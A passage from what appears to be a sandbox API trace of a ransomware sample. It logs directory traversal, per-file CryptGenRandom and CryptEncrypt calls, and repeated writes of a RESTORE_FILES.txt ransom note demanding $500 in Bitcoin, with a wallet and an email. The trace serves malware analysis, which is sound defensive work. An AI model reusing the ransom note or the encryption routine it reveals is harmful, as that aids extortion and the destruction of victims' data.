(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.023] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.023] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.023] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0095.023] CloseHandle (hObject=0x14c) returned 1 [0095.024] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0095.024] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0095.024] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt") returned 72 [0095.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0095.041] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.041] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0095.042] lstrlenA (lpString="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") returned 684 [0095.042] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0095.042] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.042] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.042] CloseHandle (hObject=0xd8) returned 1 [0095.042] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0095.042] lstrcmpiW (lpString1="SystemCertificates", lpString2="Windows") returned -1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files") returned 1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files (x86)") returned 1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="$Recycle.bin") returned 1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="System Volume Information") returned 1 [0095.043] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 65 [0095.043] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0095.043] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0095.043] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned 67 [0095.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0095.043] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.043] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.043] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.043] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.043] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.043] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.") returned 67 [0095.043] lstrcmpW 
(lpString1=".", lpString2=".") returned 0 [0095.043] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.043] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.043] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.043] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.044] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.044] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\..") returned 68 [0095.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.044] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.044] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.044] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.044] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.044] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.044] lstrcmpiW (lpString1="My", lpString2="Windows") returned -1 [0095.044] lstrcmpiW (lpString1="My", lpString2="Program Files") returned -1 [0095.044] lstrcmpiW (lpString1="My", lpString2="Program Files (x86)") returned -1 [0095.044] lstrcmpiW (lpString1="My", lpString2="$Recycle.bin") returned 1 [0095.044] lstrcmpiW (lpString1="My", lpString2="System Volume Information") returned -1 [0095.044] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 68 [0095.044] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0095.044] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0095.044] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned 70 [0095.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0095.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.045] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.045] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.045] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0095.045] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.045] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.") returned 70 [0095.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.045] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.045] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.045] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.045] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.045] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.045] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\..") returned 71 [0095.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.045] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0095.045] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.045] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.046] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.046] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="Windows") returned -1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="Program Files") returned -1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="Program Files (x86)") returned -1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="$Recycle.bin") returned 1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="System Volume Information") returned -1 [0095.046] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 81 [0095.046] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0095.046] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0095.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned 83 
[0095.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0095.047] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.047] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.047] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.047] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.047] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.") returned 83 [0095.047] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.047] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.047] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.047] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0095.047] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.047] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.047] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.047] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.047] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\..") returned 84 [0095.047] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.047] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.047] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.047] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.048] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.048] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.048] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.048] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt") returned 99 [0095.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.048] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.048] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.049] lstrlenA (lpString="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") returned 684 [0095.049] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0095.049] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.049] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.050] CloseHandle (hObject=0x150) returned 1 [0095.050] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="Windows") returned -1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="Program Files") returned -1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="Program Files (x86)") returned -1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="$Recycle.bin") returned 1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="System Volume Information") returned -1 [0095.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 73 [0095.050] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0095.050] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0095.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned 75 [0095.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0095.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.050] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.") returned 75 [0095.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.050] StrStrIW 
(lpFirst=".", lpSrch=".protected") returned 0x0 [0095.050] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.051] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0095.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\..") returned 76 [0095.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.051] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.051] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.051] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.051] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.051] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt") returned 91 [0095.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.052] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in 